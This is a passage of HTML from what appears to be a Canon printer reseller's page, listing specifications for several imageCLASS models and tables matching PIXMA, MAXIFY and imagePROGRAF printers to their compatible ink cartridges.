print.\n<ul>\n 	<li>Print, Scan, Copy</li>\n 	<li>Print Speed (A4): Up to 22ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>FPOT: Approx. 6.5 sec</li>\n 	<li>Max. paper input capacity: Up to 150 sheets</li>\n 	<li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li>\n</ul>\n<center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF113w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>Compact All-in-One with wireless connectivity</strong></p>\nSimple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Equipped with built-in Wi-Fi and access point capability.\n<ul>\n 	<li>Print, Scan, Copy</li>\n 	<li>Print Speed (A4): Up to 22ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>FPOT: Approx. 6.5 sec</li>\n 	<li>Max. paper input capacity: Up to 150 sheets</li>\n 	<li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li>\n</ul>\n<center>[maxbutton id=\"11\" ]</center>\n			<h4>imageCLASS LBP913w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>Compact with wireless connectivity, bundled with 3 cartridges</strong></p>\nKeep printing simple. The compact size fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.\n<ul>\n 	<li>Print</li>\n 	<li>Print Speed (A4): Up to 22ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>First Print Out Time (A4): Approx. 6.5 sec</li>\n 	<li>Print Resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li>\n 	<li>Mobile Printing</li>\n</ul><center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF525x</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\nSmarter way to improve office productivity and work efficiency. Equipped with innovative solution in a robust, compact design, the MF525x integrates seamlessly into busy offices and workgroups.\n<ul>\n 	<li>Print, Scan, Copy, Fax</li>\n 	<li>Print Speed (A4): Up to 43ppm</li>\n 	<li>Recommended monthly print volume: 2,000 - 7,500 pages</li>\n 	<li>FPOT: 6.2secs. (A4)</li>\n 	<li>Max. paper input capacity: Up to 2,300 sheets</li>\n 	<li>Print Resolution: Up to 1200 x 1200dpi (equivalent)</li>\n</ul>\n<center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF426dw</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>Compact 4-in-1 Black and White Multifunction for the smart business</strong></p>\nWith cutting-edge features, the MF426dw is set to boost work productivity in the modern office.\n<ul>\n 	<li>Print, Scan, Copy, Fax</li>\n 	<li>Print Speed (A4): Up to 38ppm</li>\n 	<li>Recommended monthly print volume: 750 - 4,000 pages</li>\n 	<li>FPOT: 5.5secs. (A4)</li>\n 	<li>Max. paper input capacity: Up to 900 sheets</li>\n 	<li>Print Resolution: Up to 1200 x 1200dpi (equivalent)</li>\n</ul>\n<center>[maxbutton id=\"11\" ]</center>		\n			<h2>Cartridge Printers :-</h2>		\n		<table border=\"1\" width=\"378\">\n<tbody>\n<tr align=\"center\">\n<td width=\"170\"><strong>Model</strong></td>\n<td width=\"208\"><strong>Cartridge / Bottle</strong></td>\n</tr>\n<tr>\n<td rowspan=\"13\" align=\"center\">imagePROGRAF PRO-500</td>\n<td>Maintenance Cartridge MC-20</td>\n</tr>\n<tr>\n<td>PFI-50 (Blue)</td>\n</tr>\n<tr>\n<td>PFI-50 (Chroma Optimizer)</td>\n</tr>\n<tr>\n<td>PFI-50 (Cyan)</td>\n</tr>\n<tr>\n<td>PFI-50 (Gray)</td>\n</tr>\n<tr>\n<td>PFI-50 (Magenta)</td>\n</tr>\n<tr>\n<td>PFI-50 (Matte Black)</td>\n</tr>\n<tr>\n<td>PFI-50 (Photo Black)</td>\n</tr>\n<tr>\n<td>PFI-50 (Photo Cyan)</td>\n</tr>\n<tr>\n<td>PFI-50 (Photo Gray)</td>\n</tr>\n<tr>\n<td>PFI-50 (Photo Magenta)</td>\n</tr>\n<tr>\n<td>PFI-50 (Red)</td>\n</tr>\n<tr>\n<td>PFI-50 (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"8\" align=\"center\">MAXIFY iB4170</td>\n<td>PGI-2700 (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"8\" align=\"center\">MAXIFY MB5070</td>\n<td>PGI-2700 (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"8\" align=\"center\">MAXIFY MB5170</td>\n<td>PGI-2700 (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"8\" align=\"center\">MAXIFY MB5370</td>\n<td>PGI-2700 (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"8\" align=\"center\">MAXIFY MB5470</td>\n<td>PGI-2700 (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"3\" align=\"center\">PIXMA E3170</td>\n<td>CL-57 (Colour)</td>\n</tr>\n<tr>\n<td>CL-57S (Colour)</td>\n</tr>\n<tr>\n<td>PG-47 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"3\" align=\"center\">PIXMA E410</td>\n<td>CL-57 (Colour)</td>\n</tr>\n<tr>\n<td>CL-57S (Colour)</td>\n</tr>\n<tr>\n<td>PG-47 (Pigment Black)</td>\n</tr>\n</tbody>\n</table><table border=\"1\" width=\"378\" cellpadding=\"10\">\n<tbody>\n<tr align=\"center\">\n<td width=\"170\"><strong>Model</strong></td>\n<td width=\"208\"><strong>Cartridge / Bottle</strong></td>\n</tr>\n<tr>\n<td rowspan=\"3\" align=\"center\">PIXMA E4270</td>\n<td>CL-57 (Colour)</td>\n</tr>\n<tr>\n<td>CL-57S (Colour)</td>\n</tr>\n<tr>\n<td>PG-47 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"3\" align=\"center\">PIXMA E470</td>\n<td>CL-57 (Colour)</td>\n</tr>\n<tr>\n<td>CL-57S (Colour)</td>\n</tr>\n<tr>\n<td>PG-47 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"2\" align=\"center\">PIXMA E477</td>\n<td>CL-57S (Colour)</td>\n</tr>\n<tr>\n<td>PG-47 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"2\" align=\"center\">PIXMA E480</td>\n<td>CL-57 (Colour)</td>\n</tr>\n<tr>\n<td>PG-47 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"2\" align=\"center\">PIXMA E510</td>\n<td>CL-98 (Colour)</td>\n</tr>\n<tr>\n<td>PG-88 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"2\" align=\"center\">PIXMA E560</td>\n<td>CL-99 (Colour)</td>\n</tr>\n<tr>\n<td>PG-89 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"2\" align=\"center\">PIXMA E560 / E560R</td>\n<td>CL-99 (Colour)</td>\n</tr>\n<tr>\n<td>PG-89 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"4\" align=\"center\">PIXMA G1000</td>\n<td>GI-790 (Black)</td>\n</tr>\n<tr>\n<td>GI-790 (Cyan)</td>\n</tr>\n<tr>\n<td>GI-790 (Magenta)</td>\n</tr>\n<tr>\n<td>GI-790 (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"4\" align=\"center\">PIXMA G1010</td>\n<td>GI-790 (Black)</td>\n</tr>\n<tr>\n<td>GI-790 (Cyan)</td>\n</tr>\n<tr>\n<td>GI-790 (Magenta)</td>\n</tr>\n<tr>\n<td>GI-790 (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"4\" align=\"center\">PIXMA G2010</td>\n<td>GI-790 (Black)</td>\n</tr>\n<tr>\n<td>GI-790 (Cyan)</td>\n</tr>\n<tr>\n<td>GI-790 (Magenta)</td>\n</tr>\n<tr>\n<td>GI-790 (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"4\" align=\"center\">PIXMA G3000</td>\n<td>GI-790 (Black)</td>\n</tr>\n<tr>\n<td>GI-790 (Cyan)</td>\n</tr>\n<tr>\n<td>GI-790 (Magenta)</td>\n</tr>\n<tr>\n<td>GI-790 (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"4\" align=\"center\">PIXMA G3010</td>\n<td>GI-790 (Black)</td>\n</tr>\n<tr>\n<td>GI-790 (Cyan)</td>\n</tr>\n<tr>\n<td>GI-790 (Magenta)</td>\n</tr>\n<tr>\n<td>GI-790 (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"4\" align=\"center\">PIXMA G4010</td>\n<td>GI-790 (Black)</td>\n</tr>\n<tr>\n<td>GI-790 (Cyan)</td>\n</tr>\n<tr>\n<td>GI-790 (Magenta)</td>\n</tr>\n<tr>\n<td>GI-790 (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"2\" align=\"center\">PIXMA iP100</td>\n<td>CLI-36 (Colour)</td>\n</tr>\n<tr>\n<td>PGI-35 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"2\" align=\"center\">PIXMA iP110</td>\n<td>CLI-36 (Colour)</td>\n</tr>\n<tr>\n<td>PGI-35 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"2\" align=\"center\">PIXMA iP110 (with battery)</td>\n<td>CLI-36 (Colour)</td>\n</tr>\n<tr>\n<td>PGI-35 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"3\" align=\"center\">PIXMA iP1300</td>\n<td>CL-41 (Colour)</td>\n</tr>\n<tr>\n<td>PG-40 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-40/CL-41 Value Pack</td>\n</tr>\n<tr>\n<td rowspan=\"6\" align=\"center\">PIXMA iP2770 / iP2772</td>\n<td>CL-811 (Colour)</td>\n</tr>\n<tr>\n<td>CL-811XL (Colour)</td>\n</tr>\n<tr>\n<td>PG-810 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-810 Twin Pack</td>\n</tr>\n<tr>\n<td>PG-810/CL-811 Value Pack</td>\n</tr>\n<tr>\n<td>PG-810XL (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"4\" align=\"center\">PIXMA iP2870S</td>\n<td>CL-746 (Colour)</td>\n</tr>\n<tr>\n<td>CL-746S (Colour)</td>\n</tr>\n<tr>\n<td>PG-745 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-745S (Pigment Black)</td>\n</tr>\n</tbody>\n</table><table border=\"1\" width=\"378\" cellpadding=\"10\">\n<tbody>\n<tr align=\"center\">\n<td width=\"170\"><strong>Model</strong></td>\n<td width=\"208\"><strong>Cartridge / Bottle</strong></td>\n</tr>\n<tr>\n<td rowspan=\"5\" align=\"center\">PIXMA iP4200</td>\n<td>CLI-8 (Black)</td>\n</tr>\n<tr>\n<td>CLI-8 (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-8 (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-8 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-5 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"10\" align=\"center\">PIXMA iP7270</td>\n<td>CLI-751 (Black)</td>\n</tr>\n<tr>\n<td>CLI-751 (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-751 (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-751 (Yellow)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Black)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-750 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PGI-750XL (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"12\" align=\"center\">PIXMA iP8770</td>\n<td>CLI-751 (Black)</td>\n</tr>\n<tr>\n<td>CLI-751 (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-751 (Gray)</td>\n</tr>\n<tr>\n<td>CLI-751 (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-751 (Yellow)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Black)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Gray)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-750 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PGI-750XL (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"11\" align=\"center\">PIXMA iX6770</td>\n<td>CLI-751 (Black)</td>\n</tr>\n<tr>\n<td>CLI-751 (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-751 (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-751 (Yellow)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Black)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-750 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PGI-750XL (Pigment Black)</td>\n</tr>\n<tr>\n<td>PGI-755XXL (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"11\" align=\"center\">PIXMA iX6870</td>\n<td>CLI-751 (Black)</td>\n</tr>\n<tr>\n<td>CLI-751 (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-751 (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-751 (Yellow)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Black)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-750 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PGI-750XL (Pigment Black)</td>\n</tr>\n<tr>\n<td>PGI-755XXL (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"6\" align=\"center\">PIXMA MG2570S</td>\n<td>CL-746 (Colour)</td>\n</tr>\n<tr>\n<td>CL-746S (Colour)</td>\n</tr>\n<tr>\n<td>CL-746XL (Colour)</td>\n</tr>\n<tr>\n<td>PG-745 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-745S (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-745XL (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"6\" align=\"center\">PIXMA MG2577S</td>\n<td>CL-746 (Colour)</td>\n</tr>\n<tr>\n<td>CL-746S (Colour)</td>\n</tr>\n<tr>\n<td>CL-746XL (Colour)</td>\n</tr>\n<tr>\n<td>PG-745 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-745S (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-745XL (Pigment Black)</td>\n</tr>\n</tbody>\n</table><table border=\"1\" width=\"378\" cellpadding=\"10\"><tbody><tr align=\"center\"><td width=\"170\"><strong>Model</strong></td><td width=\"208\"><strong>Cartridge / Bottle</strong></td></tr><tr><td rowspan=\"5\" align=\"center\">PIXMA MG3570</td><td>CL-741 (Colour)</td></tr><tr><td>CL-741XL (Colour)</td></tr><tr><td>PG-740 (Pigment Black)</td></tr><tr><td>PG-740/CL-741 Value Pack</td></tr><tr><td>PG-740XL (Pigment Black)</td></tr><tr><td rowspan=\"5\" align=\"center\">PIXMA MG3670</td><td>CL-741 (Colour)</td></tr><tr><td>CL-741XL (Colour)</td></tr><tr><td>PG-740 (Pigment Black)</td></tr><tr><td>PG-740/CL-741 Value Pack</td></tr><tr><td>PG-740XL (Pigment Black)</td></tr><tr><td rowspan=\"10\" align=\"center\">PIXMA MG7570</td><td>CLI-751 (Black)</td></tr><tr><td>CLI-751 (Cyan)</td></tr><tr><td>CLI-751 (Gray)</td></tr><tr><td>CLI-751 (Magenta)</td></tr><tr><td>CLI-751 (Yellow)</td></tr><tr><td>CLI-751XL (Black)</td></tr><tr><td>CLI-751XL (Cyan)</td></tr><tr><td>CLI-751XL (Gray)</td></tr><tr><td>CLI-751XL (Magenta)</td></tr><tr><td>CLI-751XL (Yellow)</td></tr><tr><td rowspan=\"3\" align=\"center\">PIXMA MP160</td><td>CL-41 (Colour)</td></tr><tr><td>PG-40 (Pigment Black)</td></tr><tr><td>PG-40/CL-41 Value Pack</td></tr><tr><td rowspan=\"3\" align=\"center\">PIXMA MP170</td><td>CL-41 (Colour)</td></tr><tr><td>PG-40 (Pigment Black)</td></tr><tr><td>PG-40/CL-41 Value Pack</td></tr><tr><td rowspan=\"3\" align=\"center\">PIXMA MP180</td><td>CL-41 (Colour)</td></tr><tr><td>PG-40 (Pigment Black)</td></tr><tr><td>PG-40/CL-41 Value Pack</td></tr><tr><td rowspan=\"5\" align=\"center\">PIXMA MP228</td><td>CL-41 (Colour)</td></tr><tr><td>CL-831 (Colour)</td></tr><tr><td>PG-40 (Pigment Black)</td></tr><tr><td>PG-40/CL-41 Value Pack</td></tr><tr><td>PG-830 (Pigment Black)</td></tr><tr><td rowspan=\"6\" align=\"center\">PIXMA MP237</td><td>CL-811 (Colour)</td></tr><tr><td>CL-811XL (Colour)</td></tr><tr><td>PG-810 (Pigment Black)</td></tr><tr><td>PG-810 Twin Pack</td></tr><tr><td>PG-810/CL-811 Value Pack</td></tr><tr><td>PG-810XL (Pigment Black)</td></tr><tr><td rowspan=\"6\" align=\"center\">PIXMA MP245</td><td>CL-811 (Colour)</td></tr><tr><td>CL-811XL (Colour)</td></tr><tr><td>PG-810 (Pigment Black)</td></tr><tr><td>PG-810 Twin Pack</td></tr><tr><td>PG-810/CL-811 Value Pack</td></tr><tr><td>PG-810XL (Pigment Black)</td></tr><tr><td rowspan=\"6\" align=\"center\">PIXMA MP258</td><td>CL-811 (Colour)</td></tr><tr><td>CL-811XL (Colour)</td></tr><tr><td>PG-810 (Pigment Black)</td></tr><tr><td>PG-810 Twin Pack</td></tr><tr><td>PG-810/CL-811 Value Pack</td></tr><tr><td>PG-810XL (Pigment Black)</td></tr><tr><td rowspan=\"6\" align=\"center\">PIXMA MP276</td><td>CL-811 (Colour)</td></tr><tr><td>CL-811XL (Colour)</td></tr><tr><td>PG-810 (Pigment Black)</td></tr><tr><td>PG-810 Twin Pack</td></tr><tr><td>PG-810/CL-811 Value Pack</td></tr><tr><td>PG-810XL (Pigment Black)</td></tr></tbody></table><table border=\"1\" width=\"378\" cellpadding=\"10\">\n<tbody>\n<tr align=\"center\">\n<td width=\"170\"><strong>Model</strong></td>\n<td width=\"208\"><strong>Cartridge / Bottle</strong></td>\n</tr>\n<tr>\n<td rowspan=\"6\" align=\"center\">PIXMA MP287</td>\n<td>CL-811 (Colour)</td>\n</tr>\n<tr>\n<td>CL-811XL (Colour)</td>\n</tr>\n<tr>\n<td>PG-810 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-810 Twin Pack</td>\n</tr>\n<tr>\n<td>PG-810/CL-811 Value Pack</td>\n</tr>\n<tr>\n<td>PG-810XL (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"3\" align=\"center\">PIXMA MP460</td>\n<td>CL-41 (Colour)</td>\n</tr>\n<tr>\n<td>PG-40 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-40/CL-41 Value Pack</td>\n</tr>\n<tr>\n<td rowspan=\"5\" align=\"center\">PIXMA MP476</td>\n<td>CL-41 (Colour)</td>\n</tr>\n<tr>\n<td>CL-831 (Colour)</td>\n</tr>\n<tr>\n<td>PG-40 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-40/CL-41 Value Pack</td>\n</tr>\n<tr>\n<td>PG-830 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"6\" align=\"center\">PIXMA MP486</td>\n<td>CL-811 (Colour)</td>\n</tr>\n<tr>\n<td>CL-811XL (Colour)</td>\n</tr>\n<tr>\n<td>PG-810 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-810 Twin Pack</td>\n</tr>\n<tr>\n<td>PG-810/CL-811 Value Pack</td>\n</tr>\n<tr>\n<td>PG-810XL (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"6\" align=\"center\">PIXMA MP496</td>\n<td>CL-811 (Colour)</td>\n</tr>\n<tr>\n<td>CL-811XL (Colour)</td>\n</tr>\n<tr>\n<td>PG-810 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-810 Twin Pack</td>\n</tr>\n<tr>\n<td>PG-810/CL-811 Value Pack</td>\n</tr>\n<tr>\n<td>PG-810XL (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"6\" align=\"center\">PIXMA MP497</td>\n<td>CL-811 (Colour)</td>\n</tr>\n<tr>\n<td>CL-811XL (Colour)</td>\n</tr>\n<tr>\n<td>PG-810 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-810 Twin Pack</td>\n</tr>\n<tr>\n<td>PG-810/CL-811 Value Pack</td>\n</tr>\n<tr>\n<td>PG-810XL (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"5\" align=\"center\">PIXMA MP500</td>\n<td>CLI-8 (Black)</td>\n</tr>\n<tr>\n<td>CLI-8 (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-8 (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-8 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-5 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"4\" align=\"center\">PIXMA MP520</td>\n<td>CLI-8 (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-8 (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-8 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-5 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"5\" align=\"center\">PIXMA MP530</td>\n<td>CLI-8 (Black)</td>\n</tr>\n<tr>\n<td>CLI-8 (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-8 (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-8 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-5 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"5\" align=\"center\">PIXMA MP568</td>\n<td>CLI-821 (Black)</td>\n</tr>\n<tr>\n<td>CLI-821 (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-821 (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-821 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-820 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"5\" align=\"center\">PIXMA MP600</td>\n<td>CLI-8 (Black)</td>\n</tr>\n<tr>\n<td>CLI-8 (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-8 (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-8 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-5 (Pigment Black)</td>\n</tr>\n</tbody>\n</table><table width=\"378\" border=\"1\" cellpadding=\"10\">\n  <tbody>\n    <tr align=\"center\">\n      <td width=\"170\"><strong>Model</strong></td>\n      <td width=\"208\"><strong>Cartridge / Bottle</strong></td>\n    </tr>\n    <tr>\n      <td rowspan=\"5\" align=\"center\">PIXMA MP610</td>\n      <td>CLI-8 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-5 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"5\" align=\"center\">PIXMA MP628</td>\n      <td>CLI-821 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-820 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"5\" align=\"center\">PIXMA MP638</td>\n      <td>CLI-821 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-820 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"5\" align=\"center\">PIXMA MP648</td>\n      <td>CLI-821 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-820 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"5\" align=\"center\">PIXMA MP800</td>\n      <td>CLI-8 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-5 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"5\" align=\"center\">PIXMA MP800R</td>\n      <td>CLI-8 (Black)</td>\n    